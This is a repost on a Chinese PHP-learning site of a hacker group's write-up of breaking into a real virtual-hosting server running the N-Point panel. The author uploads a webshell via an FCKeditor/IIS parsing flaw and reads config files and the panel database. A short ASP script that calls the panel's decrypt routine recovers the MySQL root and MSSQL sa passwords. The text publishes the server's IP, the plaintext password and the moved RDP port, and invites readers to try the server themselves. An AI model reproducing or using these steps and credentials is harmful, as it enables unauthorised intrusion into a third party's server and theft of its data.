网站地图    收藏   

主页 > 后端 > 网站安全 >

N点虚拟主机提权实例 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 一开始看的时候我就知道是一台虚拟主机,而且应该支持php,asp,aspx这个站首先我找到了一个FCKeditor,这个FCK编辑器没有FileManager文件夹,于是我构造了/fckeditor/editor/fckeditor.html?toolbar=def...

一开始看的时候我就知道是一台虚拟主机,而且应该支持php,asp,aspx
这个站首先我找到了一个FCKeditor,这个FCK编辑器没有FileManager文件夹,于是我构造了/fckeditor/editor/fckeditor.html?toolbar=default这个路径
点击浏览服务器出现:/admin/fckeditor/dialog/select_images.php?f=form1.imgsrc&imgstick=big
这样一个地址,居然不是browser,估计版本更高级了吧
好在服务器是IIS,比较省力的就传上去IIS解析漏洞的webshell了(这个版本的FCK创建文件夹时禁止输入点“.”,但是可以抓包或者本地表单POST创建,方法很多)
 



目录不出意外的没有设置严,Porgrams目录可读,而且MYSQL的data目录也在里面(MySQL的data目录有可能在其他目录,比方说某磁盘根目录,Documents目录或者2008的Users目录等)
D:/Program Files/MySQL/MySQL Server 5.0/data/mysql/user.MYD
这个文件读出来却是这样的:

 
懒得读hash了,这种hash太狗屎了,尼玛
直接翻服务器找吧。C盘我能列举的目录全都无权访问,那我用aspx的马读一下IIS配置吧:

 
这个ip解析很可疑哇,直接打开访问:199.119.207.222
是个虚拟主机管理系统:N点虚拟主机管理系统
 

 
直接从Webshell进入这个程序目录:C:/Program Files/ndianzhuji/npointhost1.9.6/web发现可读。这还是目录权限没有设置对
先读取:C:/Program Files/ndianzhuji/npointhost1.9.6/web/inc/conn.asp这个文件,居然是个access的数据库,郁闷
 
是默认数据库路径
 

 
下载下数据库来读hostcs表(其他表我翻过了,没有有用的)
servupath表中:C:\Serv-U但是这个目录就无权了
mssqlpass表内容:
FC9JBFO6UAS3Z25KAIFYUYV58@IGGFDOEBFLNONCKMHMENDEJAEIEHJJE@LJKJE@NKLHJCFFNIOOCKLBMFNEMDFIMNP@J@BH@MILGFMGCHLKFH@FAL@MHB@NNHLD@OOAFLMLKBLOEAKFBKIN@K@EK@JHJAAMMGKBMNOEI@GCHGHIJHI@@OKMBOPCPDJNK@HA@JFMIBKDHCLJEJ@MEFE@FL@F
mysqlpass表内容:
I0F7FSIGBQN6H263L34DXIZ1K@KNGOBDEGLLICIFIJIGEJP@LGDBELKGAHEHIMFEMINNMCIIKEOFCLLBMFNEMDFIMNP@J@BH@MILGFMGCHLKFH@FAL@MHB@NNHLD@OOAFLMLKBLOEAKFBKIN@K@EK@JHJAAMMGKBMNOEKGDOCDICMKCILBIICIOOKOMELFH@AGCEB@FJIMHKKBCHHIALI@@B
APIpass内容为:
KGOGKSEEZEX7C4@EFGNJIODO@OOP@FDCNJJEI@JI@O@FJKOBADCF@CJIJD@FHHCFJLEJCLHCDK@BKFK@C
 
全都是加密过的,既然要登陆,就要明文,既然明文,就是可逆
继续看源码:if iishost.Eduserpassword(""&rs("mailadminpass")&"",0)<>trim(request.Form("password")) then
复制代码WEB目录下没有和Eduserpassword函数相关的任何文件
于是想到了API,下载了C:/Program Files/ndianzhuji/npointhost1.9.6/isapi/SUBDOMAIN.dll这个文件,简单分析了一下,确实加密解密算法是在里面
不过不难。我们不需要费劲的去逆向算法,用现成的就好。
php对C:/Program Files/ndianzhuji/npointhost1.9.6/web/这个目录无权,asp也无权,但是用aspx却发现C:\Program Files\ndianzhuji\npointhost1.9.6\web\host_date这个目录可写
解密的话我们这样构造一个asp文件:<%
 
set iishost=server.CreateObject("npoint.host")
 
silic=iishost.Eduserpassword("I0F7FSIGBQN6H263L34DXIZ1K@KNGOBDEGLLICIFIJIGEJP@LGDBELKGAHEHIMFEMINNMCIIKEOFCLLBMFNEMDFIMNP@J@BH@MILGFMGCHLKFH@FAL@MHB@NNHLD@OOAFLMLKBLOEAKFBKIN@K@EK@JHJAAMMGKBMNOEKGDOCDICMKCILBIICIOOKOMELFH@AGCEB@FJIMHKKBCHHIALI@@B",0)
 
response.write silic
 
%> www.2cto.com
复制代码就解除了MYSQL密码了,最后得到MYSQL的root密码yuchenwq,MSSQL的sa密码:yuchenwq
纵使他服务器有各种防护,让人把MYSQL和MSSQL的最高管理员密码知道了,也一样会蛋疼菊紧

 
用aspx读取注册表发现3389端口更改为9918了

 
服务器简直弱爆了,有兴趣的同学 可以上去试试。不过。。。做人要厚道

作者:YoCo Smart 来自:Silic Group Hacker Army BlackBap.Org

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论